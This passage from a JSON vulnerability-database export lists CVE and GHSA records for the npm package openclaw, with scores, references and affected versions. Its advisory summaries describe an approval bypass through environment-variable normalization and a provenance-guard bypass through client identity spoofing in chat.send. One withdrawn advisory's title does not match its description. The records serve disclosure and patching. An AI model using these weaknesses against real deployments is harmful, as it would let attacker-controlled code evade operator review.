                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41294",
                "GHSA-8rh7-6779-cjqq"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1smq-mbty-jkaj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90105?format=api",
            "vulnerability_id": "VCID-1ufd-uuqk-nbdv",
            "summary": "Duplicate Advisory: OpenClaw: Windows media loaders accepted remote-host file URLs before local path validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-h3x4-hc5v-v2gm. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw versions prior to commit b57b680 contain an approval bypass vulnerability due to inconsistent environment variable normalization between approval and execution paths, allowing attackers to inject environment variables they control into execution without validation by the approval system. Because approval processing discards non-portable keys while execution accepts them, such keys bypass operator review and can potentially influence runtime behavior, including execution of attacker-controlled binaries.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/59182",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/59182"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-98ch-45wp-ch47"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34426",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34426"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8h8f-7cxm-m38j",
                    "reference_id": "GHSA-8h8f-7cxm-m38j",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8h8f-7cxm-m38j"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-8h8f-7cxm-m38j"
            ],
            "risk_score": 3.4,
            "exploitability": "0.5",
            "weighted_severity": "6.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1ufd-uuqk-nbdv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91104?format=api",
            "vulnerability_id": "VCID-24m7-jx1g-hqde",
            "summary": "OpenClaw: Gateway chat.send ACP-only provenance guard could be bypassed by client identity spoofing\n## Summary\n\nACP-only provenance fields in `chat.send` were gated by self-declared client metadata from the WebSocket handshake rather than verified authorization state.\n\n## Impact\n\nA normal authenticated operator client could spoof ACP identity labels and inject reserved provenance fields intended only for the ACP bridge.\n\n## Affected Component\n\n`src/gateway/server-methods/chat.ts, src/gateway/server/ws-connection/message-handler.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4b9542716c` (`Gateway: require verified scope for chat provenance`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41299",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20486",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20434",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20474",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41299"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/4b9542716c26ac77652bcaa0f562043b298b409f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/4b9542716c26ac77652bcaa0f562043b298b409f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6xg4-82hv-cp6f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
